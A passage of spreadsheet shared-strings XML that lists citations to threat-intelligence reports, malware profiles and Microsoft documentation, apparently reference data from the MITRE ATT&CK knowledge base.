  </si>
  <si>
    <t>Piper, S.. (2018, September 24). Investigating Malicious AMIs. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018.</t>
  </si>
  <si>
    <t>Luke Jenkins, Sarah Hawley, Parnian Najafi, Doug Bienstock. (2021, December 6). Suspected Russian Activity Targeting Government and Business Entities Around the Globe. Retrieved April 15, 2022.</t>
  </si>
  <si>
    <t>Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.</t>
  </si>
  <si>
    <t>Pravs. (2009, May 25). What you need to know about alternate data streams in windows? Is your Data secure? Can you restore that?. Retrieved March 21, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.</t>
  </si>
  <si>
    <t>Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.</t>
  </si>
  <si>
    <t>Stama, D.. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016.</t>
  </si>
  <si>
    <t>Sponchioni, R.. (2016, March 11). Backdoor.Nidiran. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.</t>
  </si>
  <si>
    <t>DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.</t>
  </si>
  <si>
    <t>Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.</t>
  </si>
  <si>
    <t>Kamble, V. (2022, June 28). Bumblebee: New Loader Rapidly Assuming Central Position in Cyber-crime Ecosystem. Retrieved August 24, 2022.</t>
  </si>
  <si>
    <t>Pantig, J. (2018, July 30). OSX.Calisto. Retrieved September 7, 2018.</t>
  </si>
  <si>
    <t>Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved July 10, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020.</t>
  </si>
  <si>
    <t>Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.</t>
  </si>
  <si>
    <t>Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019.</t>
  </si>
  <si>
    <t>Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.</t>
  </si>
  <si>
    <t>Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.</t>
  </si>
  <si>
    <t>Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.</t>
  </si>
  <si>
    <t>Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.</t>
  </si>
  <si>
    <t>O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.</t>
  </si>
  <si>
    <t>Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Bingham, J. (2013, February 11). Cross-Platform Frutas RAT Builder and Back Door. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018.</t>
  </si>
  <si>
    <t>Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.</t>
  </si>
  <si>
    <t>Fitzgerald, P. (2010, January 26). How Trojan.Hydraq Stays On Your Computer. Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.</t>
  </si>
  <si>
    <t>Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.</t>
  </si>
  <si>
    <t>Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018.</t>
  </si>
  <si>
    <t>Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil &amp; Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.</t>
  </si>
  <si>
    <t>Neville, A. (2012, June 15). Trojan.Naid. Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2012, June 18). CVE-2012-1875 Exploited in the Wild - Part 1 (Trojan.Naid). Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>Ladley, F. (2012, May 15). Backdoor.Nerex. Retrieved February 23, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response Attack Investigation Team. (2018, April 23). Orangeworm: Indicators of Compromise. Retrieved July 8, 2018.</t>
  </si>
  <si>
    <t>Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Mullaney, C. &amp; Honda, H. (2012, May 4). Trojan.Pasam. Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Ladley, F. (2012, May 15). Backdoor.Ritsol. Retrieved February 23, 2018.</t>
  </si>
  <si>
    <t>Hatch, B. (2004, November 22). SSH and ssh-agent. Retrieved January 8, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response Attack Investigation Team. (2018, October 30). SamSam: Targeted Ransomware Attacks Continue. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2015, July 13). “Forkmeiamfamous”: Seaduke, latest weapon in the Duke armory. Retrieved July 22, 2015.</t>
  </si>
  <si>
    <t>Moench, B. and Aboud, E. (2016, August 23). Trojan.Kwampirs. Retrieved May 10, 2018.</t>
  </si>
  <si>
    <t>Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.</t>
  </si>
  <si>
    <t>Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Symantec Threat Hunter Team. (2021, January 22). SolarWinds: How Sunburst Sends Data Back to the Attackers. Retrieved January 22, 2021.</t>
  </si>
  <si>
    <t>Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. Retrieved July 10, 2018.</t>
  </si>
  <si>
    <t>DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.</t>
  </si>
  <si>
    <t>Symantec Threat Hunter Team. (2022, February 24). Ukraine: Disk-wiping Attacks Precede Russian Invasion. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>Yagi, J. (2014, August 24). Trojan.Volgmer. Retrieved July 16, 2018.</t>
  </si>
  <si>
    <t>Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.</t>
  </si>
  <si>
    <t>Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.</t>
  </si>
  <si>
    <t>Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.</t>
  </si>
  <si>
    <t>Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.</t>
  </si>
  <si>
    <t>Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018.</t>
  </si>
  <si>
    <t>Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020.</t>
  </si>
  <si>
    <t>Huang, K. (2020, November 23). Zoom into Kinsing. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>Russinovich, R. &amp; Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>Apple. (n.d.). System and kernel extensions in macOS. Retrieved March 31, 2022.</t>
  </si>
  <si>
    <t>Aaron Kili. (2018, January 16). How to Control Systemd Services on Remote Linux Server. Retrieved July 26, 2021.</t>
  </si>
  <si>
    <t>Freedesktop.org. (n.d.). systemd.service — Service unit configuration. Retrieved March 16, 2020.</t>
  </si>
  <si>
    <t>redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>Trusted Computing Group. (2008, April 29). Trusted Platform Module (TPM) Summary. Retrieved June 8, 2016.</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>THE FINANCIAL TIMES. (2019, September 2). A sobering day. Retrieved October 8, 2019.</t>
  </si>
  <si>
    <t>The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.</t>
  </si>
  <si>
    <t>Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.</t>
  </si>
  <si>
    <t>Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022.</t>
  </si>
  <si>
    <t>Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.</t>
  </si>
  <si>
    <t>Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.</t>
  </si>
  <si>
    <t>Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.</t>
  </si>
  <si>
    <t>Brumaghin, E.. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.</t>
  </si>
  <si>
    <t>An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.</t>
  </si>
  <si>
    <t>Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.</t>
  </si>
  <si>
    <t>Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.</t>
  </si>
  <si>
    <t>Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.</t>
  </si>
  <si>
    <t>Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.</t>
  </si>
  <si>
    <t>Malhotra, A. (2021, March 2). ObliqueRAT returns with new campaign using hijacked websites. Retrieved September 2, 2021.</t>
  </si>
  <si>
    <t>Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.</t>
  </si>
  <si>
    <t>Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.</t>
  </si>
  <si>
    <t>Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021.</t>
  </si>
  <si>
    <t>Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.</t>
  </si>
  <si>
    <t>Brumaghin, E., Unterbrink, H. (2018, August 22). Picking Apart Remcos Botnet-In-A-Box. Retrieved November 6, 2018.</t>
  </si>
  <si>
    <t>Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Ventura, V. (2018, January 22). SamSam - The Evolution Continues Netting Over $325,000 in 4 Weeks. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.</t>
  </si>
  <si>
    <t>Baker, B., Unterbrink H. (2018, July 03). Smoking Guns - Smoke Loader learned new tricks. Retrieved July 5, 2018.</t>
  </si>
  <si>
    <t>Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.</t>
  </si>
  <si>
    <t>Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.</t>
  </si>
  <si>
    <t>Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021.</t>
  </si>
  <si>
    <t>Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Team &amp; Detection and Response Team . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022.</t>
  </si>
  <si>
    <t>Nathaniel Quist. (2021, June 4). TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations. Retrieved February 8, 2022.</t>
  </si>
  <si>
    <t>Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Arp. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). At. Retrieved April 28, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.</t>
  </si>
  <si>
    <t>Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.</t>
  </si>
  <si>
    <t>Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Cmd. Retrieved April 18, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Copy. Retrieved April 26, 2016.</t>
  </si>
  <si>
    <t>Lich, B. (2016, May 31). Protect derived domain credentials with Credential Guard. Retrieved June 1, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Del. Retrieved April 22, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Dir. Retrieved April 18, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Dsquery. Retrieved April 18, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2004, February 6). Perimeter Firewall Design. Retrieved April 25, 2016.</t>
  </si>
  <si>
    <t>Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.</t>
  </si>
  <si>
    <t>Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.</t>
  </si>
  <si>
    <t>Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Ipconfig. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2016, April 16). Implementing Least-Privilege Administrative Models. Retrieved June 3, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2005, January 21). Creating logon scripts. Retrieved April 27, 2016.</t>
  </si>
  <si>
    <t>Nunez, N. (2017, August 9). Moving Beyond EMET II – Windows Defender Exploit Guard. Retrieved March 12, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Nbtstat. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Net time. Retrieved November 25, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2009, June 3). Netsh Commands for Windows Firewall. Retrieved April 20, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Netstat. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Koeller, B.. (2018, February 21). Defending Against Rules and Forms Injection. Retrieved November 5, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Ping. Retrieved April 8, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Overview of Remote Desktop Gateway. Retrieved June 6, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Configure Network Level Authentication for Remote Desktop Services Connections. Retrieved June 6, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2007, August 31). https://technet.microsoft.com/en-us/library/cc771759(v=ws.10).aspx. Retrieved April 20, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Route. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2013, May 8). Increase scheduling priority. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Customizing the Desktop. Retrieved December 5, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2012, November 15). Domain controller: Allow server operators to schedule tasks. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Services. Retrieved June 7, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Systeminfo. Retrieved April 8, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.</t>
  </si>
  <si>
    <t>Schauland, D. (2009, February 24). Configuring Wireless settings via Group Policy. Retrieved July 26, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.</t>
  </si>
  <si>
    <t>Mathers, B. (2016, September 30). Windows Time Service Tools and Settings. Retrieved November 25, 2016.</t>
  </si>
  <si>
    <t>Mohta, A. (n.d.). Block Chrome Extensions using Google Chrome Group Policy Settings. Retrieved January 10, 2018.</t>
  </si>
  <si>
    <t>Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.</t>
  </si>
  <si>
    <t>Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.</t>
  </si>
  <si>
    <t>Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020.</t>
  </si>
  <si>
    <t>T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.</t>
  </si>
  <si>
    <t>B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.</t>
  </si>
  <si>
    <t>Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.</t>
  </si>
  <si>
    <t>ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.</t>
  </si>
  <si>
    <t>Shevchenko, S.. (2008, November 30). Agent.btz - A Threat That Hit Pentagon. Retrieved April 8, 2016.</t>
  </si>
  <si>
    <t>Fidelis Threat Research Team. (2016, May 2). Turbo Twist: Two 64-bit Derusbi Strains Converge. Retrieved August 16, 2018.</t>
  </si>
  <si>
    <t>Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.</t>
  </si>
  <si>
    <t>Vest, J. (2017, October 9). Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads. Retrieved September 10, 2019.</t>
  </si>
  <si>
    <t>Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020.</t>
  </si>
  <si>
    <t>Seals, T. (2021, May 14). FIN7 Backdoor Masquerades as Ethical Hacking Tool. Retrieved February 2, 2022.</t>
  </si>
  <si>
    <t>L. O'Donnell. (2019, March 3). RSAC 2019: New Operation Sharpshooter Data Reveals Higher Complexity, Scope. Retrieved September 26, 2022.</t>
  </si>
  <si>
    <t>Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack, Mitigation, Defense. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.</t>
  </si>
  <si>
    <t>ss64. (n.d.). trap. Retrieved May 21, 2019.</t>
  </si>
  <si>
    <t>U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021.</t>
  </si>
  <si>
    <t>US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.</t>
  </si>
  <si>
    <t>Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.</t>
  </si>
  <si>
    <t>Trend Micro. (2014, February 27). CARBERP. Retrieved July 29, 2020.</t>
  </si>
  <si>
    <t>Trend Micro. (2014, March 18). Conficker. Retrieved February 18, 2021.</t>
  </si>
  <si>
    <t>Haquebord, F. et al. (2022, March 17). Cyclops Blink Sets Sights on Asus Routers. Retrieved March 17, 2022.</t>
  </si>
  <si>
    <t>Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.</t>
  </si>
  <si>
